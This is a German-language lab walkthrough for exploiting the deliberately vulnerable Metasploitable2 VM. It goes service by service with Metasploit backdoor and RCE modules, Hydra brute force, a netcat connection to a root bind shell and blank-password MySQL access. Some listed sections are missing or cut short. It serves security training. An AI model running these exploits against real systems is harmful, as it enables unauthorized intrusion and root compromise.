- Metasploitable2 Vollständiger Überblick
- Ausnutzen aller Ports mit verschiedenen Techniken :
- 22-.SSH
- 23-TELNET
- 25-SMTP
- Methode 2
- 139&445 Netbios-SSN
- 1099-Java-RMI
- Exploiting java-RMI-server
- 1524-BINDSHELL
- Exploitation
- 2121-ProFTPD
- 3306-MYSQL
- 3632-DISTCCD
- Ausnutzung von Port 3632 mit distcc-exec
- Exploiting PostgreSQL mit postgre_payload
- 5900-VNC
- 6000-X11
- Ausnutzen des Ports 6000 mit ssh
- 6667 & 6697 UnrealIRCD
- Methode 1: Auf Port 6667
- Methode 2: Auf Port 6697
- 8180-TOMCAT
- Exploiting Apache-Tomcat
- 8787-Ruby-drb
Metasploitable2 Vollständiger Überblick
Metasploitable ist eine absichtlich verwundbare virtuelle Linux-Maschine.
Diese VM kann zur Durchführung von Sicherheitsschulungen, zum Testen von Sicherheitstools und zum Üben gängiger Penetrationstesttechniken verwendet werden.
Installation und Konfiguration
Wir sind hier, um Metasploitable 2 auszunutzen (Verdammt verwundbare Maschine für Penetrationstests)
Holen Sie sich diese Metasploiable2 Maschine von https://information.rapid7.com/download-metasploitable-2017.html
Installationsprozess:
- Öffnen Sie VirtualBox und klicken Sie auf die Schaltfläche „Neu“, um eine neue virtuelle Maschine zu erstellen
- Geben Sie den Namen der virtuellen Maschine ein (Metasploitable2)
- Zuteilen Sie die Menge an Arbeitsspeicher (vorzugsweise, aber nicht unter 512 MB)
- Wählen Sie eine vorhandene Festplattendatei aus
- Wählen Sie die vmdk-Datei aus, die Sie von Rapid7 heruntergeladen haben
- Klicken Sie auf Erstellen…!!! Erfolgreich installiert Metasploitable2, jetzt ist es Zeit, die Netzwerkeinstellungen zu konfigurieren.
Nach der Installation ändern Sie die Netzwerkadaptereinstellungen wie folgt:
In-Network Setting: Einstellungen/Netzwerk/Adapter Ethernet oder Wireless auswählen
In der Registerkarte Erweitert auswählen: Promiscuous Mode as Allow All
Starten Sie den Metasploitable2-Rechner und versuchen Sie, sich mit den angegebenen Anmeldedaten am Banner anzumelden…!!!
Ermitteln Sie die IP-Adresse des Rechners mit dem folgenden Befehl im Terminal
ifconfig
Das ist alles für die Einrichtung….Let’s Start Hacking…
Scannen
Scannen der Matasploitable 2
Wie wir festgestellt haben, ist die IP-Adresse des Rechners 192.168.0.130
Lassen Sie uns mit Nmap scannen, das Teil von Kali Linux ist
nmap -sV -p- 192.168.0.130
Ausnutzen aller Ports mit verschiedenen Techniken :
Methode 1:
Anmeldung mit Anonymous als Benutzername und ohne Passwort.
Wenn Sie mehr Informationen über Anonymous FTP benötigen, finden Sie diese hier.
https://whatis.techtarget.com/definition/anonymous-FTP-File-Transfer-Protocol
ftp 192.168.0.130
Methode 2 :
Durch Brute-force mit Hydra, aber man braucht eine eigene Liste von Benutzernamen und Passwörtern.
hydra -L /root/Desktop/USERNAMES.txt -P /root/Desktop/PASSWORDS.txt <Target IP Address> ftp -V
Es nimmt jeden Benutzernamen und jedes Passwort aus den angegebenen Dateien und versucht, sich bei dem Ziel-FTP-Dienst anzumelden.
Sobald man die Zugangsdaten gefunden hat, kann man sich direkt einloggen.
Nach dem Login in ein Benutzerkonto kann man durch Privilegienerweiterung Root-Zugriff erhalten.
Methode 3 :
Ausnutzung von FTP durch Metasploit-Framework
Öffnen Sie die Metasploit-Framework-Konsole und suchen Sie nach vsftpd Backdoor-Exploit
msfconsole
Search vsftpd
use exploit/unix/ftp/vsftpd_234_backdoor
show options
set RHOSTS 192.168.0.130 --> <target IP address>exploit
Glückwunsch, du hast Root-Zugang
22-.SSH
Secure Shell (SSH) ist ein kryptographisches Netzwerkprotokoll zum sicheren Betrieb von Netzwerkdiensten über ein ungesichertes Netzwerk.
Ausnutzen von SSH mit verschiedenen Techniken
Methode 1
Benutzername und Passwort mit Hydra knacken
Hydra ist ein in Kali-Linux eingebautes Tool, das verwendet wird, um einen Brute-Force-Angriff durchzuführen. Der Brute-Force-Angriff ist eine Versuch-und-Irrtum-Methode, die von Anwendungsprogrammen verwendet wird, um verschlüsselte Daten wie Passwörter oder Data Encryption Standard (DES)-Schlüssel durch erschöpfende Anstrengungen (unter Verwendung von Brute-Force) zu entschlüsseln, anstatt intellektuelle Strategien einzusetzen.
hydra -L <Usernames_List> -P <Passwords_List> <Target ip address> <Service>
Setzen der erforderlichen Argumente für die Nutzlast
Show optionsSet LHOST 192.168.0.109 (Attackers IP Address)Set LPORT 4444
Prüfen, ob alle erforderlichen Argumente vorhanden sind
exploit
1099-Java-RMI
Remote Method Invocation (RMI) ist eine API, die es einem Objekt erlaubt, eine Methode auf einem Objekt aufzurufen, das in einem anderen Adressraum existiert, der sich auf demselben Rechner oder einem entfernten Rechner befinden kann.
Exploiting java-RMI-server
Suchen Sie nach dem Exploit
search java_rmi_server
Wählen Sie den Exploit nach seinem Rang aus. z.B. „excellent“ funktioniert besser als „normal“.
use exploit/multi/misc/java_rmi_servershow optionsset RHOSTS <target's IP>exploit
Wir haben uns Zugang zum Zielrechner verschafft.
1524-BINDSHELL
Bind Shell ist eine Art von Shell, bei der der Zielrechner einen Kommunikationsport oder einen Listener auf dem Opferrechner öffnet und auf eine eingehende Verbindung wartet. Der Angreifer verbindet sich dann mit dem Listener des Opferrechners, was zur Ausführung von Code oder Befehlen auf dem Server führt.
Exploitation
Es handelt sich um eine Root-Shell, so dass wir uns über den netcat-Dienst verbinden können.
nc <target ip address> 1524
Glückwunsch, Sie sind jetzt ein root-Benutzer.
2121-ProFTPD
Bevor Sie diesen Port ausnutzen, müssen Sie Anmeldedaten haben, so wie wir die Methode kennen, um sie durch Brute-Force-Technik zu bekommen, Wir können mit telnet auf ProFTPd zugreifen, Wir verwenden hier user: user.
telnet <Taget IP Address> <Port Number>USER <username>
PASS <password>
Es ist ein normaler Benutzer, Versuchen Sie Privilege Escalation um Root Kontrolle zu erlangen.
3306-MYSQL
Methode 1:
Suchen Sie nach dem Exploit
search scanner/mysql/mysql_login
use auxiliary/scanner/mysql/mysql_login
Manchmal besteht die Möglichkeit, dass ein leeres Passwort für MySQL vorliegt. So können wir es direkt ausnutzen.
Hinweis: Standardmäßig zeigt es BLANK_PASSWORDS als false an, setzen Sie es auf true.
set BLANK_PASSWORDS as true
Methode:2
In dieser Methode werden wir MySQL mit diesem Befehl ausnutzen, indem wir den Benutzernamen als root und die IP des Ziels angeben.
mysql -u root -h <target's IP>
3632-DISTCCD
Distcc ist ein Tool zur Beschleunigung der Kompilierung von Quellcode durch verteiltes Rechnen über ein Computernetzwerk. Mit der richtigen Konfiguration
kann distcc die Kompilierungszeit eines Projekts drastisch reduzieren
Ausnutzung von Port 3632 mit distcc-exec
Öffnen Sie msfconsole und suchen Sie nach distcc_exec
search distcc_execshow options
Setzen Sie die erforderlichen Argumente für den Exploit
set RHOSTS <target-ip>exploit
Wir haben Shell-Zugang…versuche Privilegienerweiterung für höhere Privilegien
Exploiting PostgreSQL mit postgre_payload
Öffne msfconsole & suche nach postgres_payload
search postgres_payloaduse exploit/linux/postgres/postgres_payloadshow options
Erforderliche Argumente für Exploit setzen
set RHOSTS <target-ip>
Standardmäßig, wird der Benutzername postgres
exploit
Erfolgreich bei postgresql angemeldet…Holen wir uns eine Shell, um mehr zu tun…
Versuchen Sie, eine Privilegieneskalation durchzuführen…Frohes Lernen..!!!
5900-VNC
Öffne msfconsole und suche nach Exploit vnc_login
search vnc_loginuse auxiliary/scanner/vnc/vnc_login
show optionsset RHOSTS <targets IP>set PASS_FILE <filepath that contains passwords>run (or) exploit
Diese Methode wird verwendet, um VNC-Software, die auf Linux- oder Unix- oder Windows-Betriebssystemen gehostet wird, mit einer Authentifizierungsschwachstelle auszunutzen.
Versuchen Sie, vnc mit diesem Passwort zu verbinden
Öffnen Sie den Vnc-Viewer im Terminal &Geben Sie die IP-Adresse ein und stellen Sie eine Verbindung her
Eine Anmeldeaufforderung erscheint und fordert zur Eingabe der Anmeldedaten auf
Dann das Passwort eingeben und auf OK klicken.
Voilaaa…!!! du hast Access…Ich weiß, was du jetzt denkst..Bring die Sachen nicht durcheinander.
6000-X11
Das X Window System (auch X genannt) ist ein Fenstersystem für Bitmap-Displays, das auf UNIX-basierten Betriebssystemen üblich ist. X bietet das Grundgerüst für eine GUI-basierte Umgebung.
Der X11-Remote-Server akzeptiert Verbindungen von jedem Ort aus, an dem eine Internetverbindung möglich ist. Er ist für den Zugriff auf die Grafikkarten, die Eingabegeräte und den Bildschirm auf dem Computer oder dem drahtlosen Gerät zuständig.
Ausnutzen des Ports 6000 mit ssh
ssh -X -l msfadmin 192.168.0.122
Im obigen Befehl aktiviert ‚X‘ alle Ports zur Weiterleitung, durch Angabe des Benutzernamens und der IP des Ziels erhalten wir die Shell
6667 & 6697 UnrealIRCD
UnrealIRCd ist ein Open Source IRC Server, der seit 1999 tausende von Netzwerken bedient. Er läuft auf Linux, OS X und Windows
UnrealIRCd ist ein hochentwickelter IRCd mit einem starken Fokus auf Modularität, einer fortschrittlichen und hoch konfigurierbaren Konfigurationsdatei. Zu den Hauptmerkmalen gehört SSL
UnrealIRCd ist einer der populärsten IRC-Daemons mit vollem Funktionsumfang und wird auf den meisten IRC-Servern eingesetzt
Dieser Server wird als der mit den meisten Sicherheitsmerkmalen aller IRC-Server beschrieben.
Verwendete Protokolle: Internet Relay Chat
Let’s Exploit this IRC Server.
Methode 1: Auf Port 6667
search unrealircduse exploit/unix/irc/unreal_ircd_3281_backdoorshow options
Setzen Sie die erforderlichen Argumente für Exploit
set RHOSTS <target-ip>
Standardmäßig ist die Portnummer 6667 für Exploit
run (or) exploit
Heyyy…Wir haben Root…Wir leben am Rande…
Methode 2: Auf Port 6697
Verwenden Sie den obigen Exploit und setzen Sie die erforderlichen Argumente
- Dieses Mal setzen Sie den Port auf 6697
set RHOSTS <target-ip>set RPORT 6697
Und das zweite Mal haben wir auch Root…Versuchen Sie, dies auszunutzen…Viel Spaß beim Lernen
8180-TOMCAT
Apache Tomcat ist eine Open-Source-Implementierung der Technologien Java Servlet, JavaServer Pages, Java Expression Language und WebSocket. Tomcat bietet eine „reine Java“-HTTP-Webserverumgebung, in der Java-Code ausgeführt werden kann.
Exploiting Apache-Tomcat
Es kann in zwei Schritten durchgeführt werden:
Öffnen Sie msfconsole &Suchen Sie nach tomcat_mgr_login
search tomcat_mgr_loginset RHOSTS <target-ip>
show options
Exploit wird Standardbenutzernamen &Passwörterlisten zuweisen. Nach dem Setzen der Argumente für den Exploit Typ exploit (oder) run
run
Nimm den gleichen Benutzernamen und das gleiche Passwort und gib es an den nächsten Exploit.
Suche nach Tomcat-Manager-Exploits
search tomcat_mgr_uploaduse exploit/multi/http/tomcat_mgr_uploadshow options
Setze RHOSTS, RPORT, und HttpPassword, HttpUsername, die wir vom Tomcat-Login-Exploit bekommen haben und führe dann den Exploit aus.
msfconsole könnte die passende Payload für einen Exploit zuweisen, dafür haben wir meterpreter…
8787-Ruby-drb
dRuby ist ein verteiltes Objektsystem für Ruby. Es ist in reinem Ruby geschrieben und verwendet dessen Protokoll.
Es werden keine zusätzlichen Dienste benötigt, die nicht von der Ruby-Laufzeit bereitgestellt werden, wie z.B. TCP-Sockets.
search drb_remote_codeexec
Setzen Sie die erforderlichen Argumente für den Exploit
show optionsset RHOSTS <target-ip>exploit (or) run
Glückwunsch, Sie haben Root-Shell-Zugriff bekommen…versuchen Sie, einige Shell-Befehle zu verwenden.